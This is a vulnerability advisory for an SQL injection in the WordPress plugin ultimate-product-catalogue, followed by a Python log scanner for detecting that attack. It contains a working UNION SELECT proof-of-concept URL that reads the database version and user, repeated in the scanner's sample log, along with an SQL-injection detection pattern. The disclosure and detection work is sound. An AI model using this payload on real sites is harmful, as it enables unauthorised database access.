Plugin Details
Plugin Name: wp-plugin : ultimate-product-catalogue
Affected Version : (and most probably lower versions, if any)
Vulnerability : SQL Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
- December 28, 2013: Vendor Contacted
- May 28, 2014: Public Disclosure
Technical Details
Proof of Concept : http://localhost/wp-admin/admin.php?page=UPCP-options&Action=Catalogue_Details&Selected=Catalogue&Catalogue_ID=2%20union%20select%20@@version,user(),system_user(),database(),5,6,7
Vulnerable Parameters : Catalogue_ID, SubCategory_ID, SingleProduct, Tag_ID
Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=830454%40ultimate-product-catalogue&old=821581%40ultimate-product-catalogue&sfp_email=&sfph_mail=#file2
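As an added detection example (not part of the advisory and not the plugin's code), the Python below scans access-log request lines for hits on the plugin's admin page where one of the four injectable parameters listed above carries a non-numeric value with SQL markers; it also decodes a second time so a double-encoded payload is not missed. The log lines, client IPs and timestamps are constructed; the flagged request is the proof-of-concept URL above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Parameters the advisory names as injectable, and the admin page they belong to.
VULN_PARAMS = {"Catalogue_ID", "SubCategory_ID", "SingleProduct", "Tag_ID"}
VULN_PAGE = "UPCP-options"

# Markers typical of UNION-based, comment-padded and tautology SQL injection.
SQLI_RE = re.compile(
    r"(\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|--|/\*|\bor\b\s+\d+\s*=\s*\d+)",
    re.IGNORECASE | re.DOTALL,
)
# Request line in a common/combined-format access log: "METHOD TARGET HTTP/x.y".
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target: str) -> dict:
    """Return {param: decoded value} for injectable params whose value looks like SQLi."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return {}
    query = parse_qs(parts.query, keep_blank_values=True)
    if VULN_PAGE not in query.get("page", []):
        return {}
    hits = {}
    for name in VULN_PARAMS:
        for value in query.get(name, []):
            value = unquote_plus(value)  # second decode catches %2520-style double encoding
            # The plugin expects an integer ID; anything else carrying SQL markers is flagged.
            if not value.isdigit() and SQLI_RE.search(value):
                hits[name] = value
    return hits


def scan_log(lines):
    """Yield (client_ip, param, decoded value) for each suspicious request line."""
    for line in lines:
        m = REQ_RE.search(line)
        if m:
            for name, value in suspicious_params(m.group("target")).items():
                yield line.split()[0], name, value


# Constructed sample log (IPs and timestamps are made up): a benign request, then the PoC above.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2014:10:00:01 +0000] "GET /wp-admin/admin.php?page=UPCP-options&Action=Catalogue_Details&Selected=Catalogue&Catalogue_ID=2 HTTP/1.1" 200 512',
    '203.0.113.9 - - [28/May/2014:10:00:07 +0000] "GET /wp-admin/admin.php?page=UPCP-options&Action=Catalogue_Details&Selected=Catalogue&Catalogue_ID=2%20union%20select%20@@version,user(),system_user(),database(),5,6,7 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: {name}={value!r}")
```

Because the check requires page=UPCP-options and an injectable parameter, ordinary traffic to other admin pages is not reported; a production deployment would feed real access-log lines to scan_log() instead of SAMPLE_LOG.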